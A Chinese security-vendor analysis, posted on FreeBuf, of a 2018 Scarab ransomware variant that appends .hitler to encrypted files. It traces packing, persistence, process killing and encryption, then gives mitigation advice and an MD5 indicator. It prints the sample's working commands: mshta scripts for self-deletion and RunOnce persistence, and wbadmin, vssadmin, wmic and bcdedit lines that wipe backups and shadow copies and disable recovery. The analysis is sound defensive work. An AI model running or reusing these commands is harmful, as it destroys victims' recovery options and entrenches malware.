freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

Scarab勒索病毒最新变种,希特勒“冠名”
深信服千里目安全技术中心 2018-09-20 14:00:51 379081

前言

深信服EDR安全团队跟踪了Scarab勒索病毒的最新变种,该变种文件加密后缀为.hitler,有趣的是,希特勒对应的英文就是hitler,算是莫名躺枪了。

Scarab勒索病毒的最新变种

通常,Scarab勒索病毒是利用Necurs僵尸网络进行传播的,Necurs是世界上最大的僵尸网络之一,曾用于传播多个恶意家族样本。最近一段时间,发现Scarab勒索病毒还会通过RDP爆破+人工、捆绑软件的方式进行传播。

下图,是此变种的勒索信息。

此变种的勒索信息

一、功能概述

此Scarab变种,其功能流程大致如下,依次分别为伪装录屏、屏幕快照、内存解密、设置启动、自删除、删除卷影、杀进程、遍历加密、勒索弹窗。

功能流程

伪装录屏,是为了骗过安全软件,让其误以为是一个正常的录屏软件。此外,还截图了屏幕快照。与多数病毒一样,此勒索变种同样会设置启动,做持久化操作,也会做自删除的动作。为了保证数据不可恢复,同时也做了删除卷影的操作。

此外,此勒索病毒会杀掉多数的系统进程、应用进程、杀掉进程,最后遍历文件夹,做加密。所有的文件加密成功后,弹出勒索信息。

二、详细分析

查壳,母体样本使用的是UPX加壳:

是UPX加壳

样本使用了详细的文件描述信息:

文件描述信息

脱壳分析,动态调试:

动态调试

录制音频:

录制音频

相应的反汇编代码:

反汇编代码

创建窗口:

创建窗口

获取操作系统语言版本:

获取操作系统语言版本

设置HOOK:

设置HOOK

抓屏操作:

抓屏操作

启动子进程:

启动子进程

进行持久化操作,拷贝自身到%appdata%目录下:

进行持久化操作

拷贝之后:

拷贝之后

然后启动%appdata%目录下的sevnz.exe程序:

sevnz.exe程序

解密内存相应的字符串:

解密内存相应的字符串

通过执行mshta.exe,删除自身:

通过执行mshta.exe,删除自身

相应的命令行,如下:

mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');

setInterval(function(){try{o.DeleteFile('Scarab.exe');close()}catch(e){}},10);"

调用mshta.exe程序,设置自启动项:

相应的命令行:

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');

x=new ActiveXObject('Scripting.FileSystemObject');

setInterval(function()

{try

    {i=x.GetFile('sevnz.exe').Path;

    o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce            \\iyryCNqPEUF',i);

    }catch(e){}

},

10);"

设置完成之后:

设置完成之后

通过mshta.exe设置相应的注册表项:

通过mshta.exe设置相应的注册表项

将相应的删除系统备份,磁盘卷影操作的命令行,设置为注册表项:

将相应的删除系统备份,磁盘卷影操作的命令行,设置为注册表项

通过mshta.exe执行命令:

通过mshta.exe执行命令

相应的命令行:

o=new ActiveXObject("WScript.Shell");

o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);

o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);

o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);

o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);

o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);

遍历进程:

遍历进程

发现相关的进程,则结束进程:

发现相关的进程,则结束进程

相关进程列表如下:

ccleaner.exe;ccleaner64.exe;tasklist.exe;taskmgr.exe;regedit.exe;anvir.exe;anvir64.exe;cscript.exe;wscript.exe;powershell.exe;procexp.exe;far.exe;agntsvc.exe;agntsvc.exeagntsvc.exe;agntsvc.exeencsvc.exe;agntsvc.exeisqlplussvc.exe;dbeng50.exe;dbsnmp.exe;excel.exe;firefoxconfig.exe;infopath.exe;isqlplussvc.exe;msaccess.exe;msftesql.exe;mspub.exe;mydesktopqos.exe;mydesktopservice.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;ncsvc.exe;ocautoupds.exe;ocomm.exe;ocssd.exe;onenote.exe;oracle.exe;outlook.exe;powerpnt.exe;sqbcoreservice.exe;sqlagent.exe;sqlbrowser.exe;sqlserver.exe;sqlservr.exe;sqlwriter.exe;steam.exe;synctime.exe;tbirdconfig.exe;thebat.exe;thebat64.exe;thunderbird.exe;visio.exe;winword.exe;wordpad.exe;xfssvccon.exe;

内存解密出相应的加密字符串,然后设置为注册表项:

设置为注册表项

在内存中解密生成相应的勒索信息,用户的加密ID:

在内存中解密生成相应的勒索信息,用户的加密ID

遍历文件,内存中加密相应的文件,文件名随机生成,文件后缀为hitler:

遍历文件

然后替换到原始的文件:

替换到原始的文件

然后设置加密后的文件属性:

设置加密后的文件属性

遍历文件的时候,会判断是否为加密文件列表中的后缀,相应的后缀列表有二百多种:

相应的后缀列表有二百多种

部分后缀名列表:

部分后缀名列表

同时会遍历相应的文件目录,排除以下文件目录,相应的文件目录列表如下:

\$RECYCLE.BIN\;

\All Users\;

\AppData\;

\ApplicationData\;

\System Volume Information\;

\Windows\;

\intel\;

\nvidia\;

\Trend Micro\;

在加密文件的目录下,生成对应的勒索信息文本文件,然后将之前内存生成的勒索信息,写入到文件:

生成对应的勒索信息文本文件

勒索信息文本文件HOW TO RECOVER ENCRYPTED FILES.TXT,最后通过执行notepad.exe程序,弹出相应的勒索信息,执行的命令行如下:

notepad.exe "C:\Users\panda\HOW TO RECOVER ENCRYPTED FILES.TXT"

三、解决方案

提醒广大用户做好病毒检测与防御措施,防护勒索病毒攻击。

1、及时给电脑打补丁,修复漏洞。

2、对重要的数据文件定期进行非本地备份。

3、不要点击来源不明的邮件附件,不从不明网站下载软件。

4、尽量关闭不必要的文件共享权限。

5、更改帐号密码,设置强密码,避免使用统一的密码,因为统一的密码会导致一台被攻破,多台遭殃。

6、Scarab勒索病毒最新变种会利用RDP(远程桌面协议),如果业务上无需使用RDP的,建议关闭RDP。当出现此类事件时,推荐使用深信服防火墙,或者终端检测响应平台(EDR)的微隔离功能对3389等端口进行封堵,防止扩散。

四、IOC

MD5

374F8ACCC92838939A6D3960AAB36AA0

*本文作者:千里目安全实验室,转载请注明来自FreeBuf.COM

# 勒索软件 # Scarab
本文为 深信服千里目安全技术中心 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
深信服千里目安全技术中心 LV.9
这家伙太懒了,还未填写个人描述!
  • 417 文章数
  • 611 关注者
【漏洞通告】Ivanti多产品缓冲区溢出漏洞(CVE-2025-22457)
2025-04-11
【漏洞通告】Vite 任意文件读取漏洞(CVE-2025-31486)
2025-04-09
【漏洞通告】微软补丁日安全通告|4月份
2025-04-09
文章目录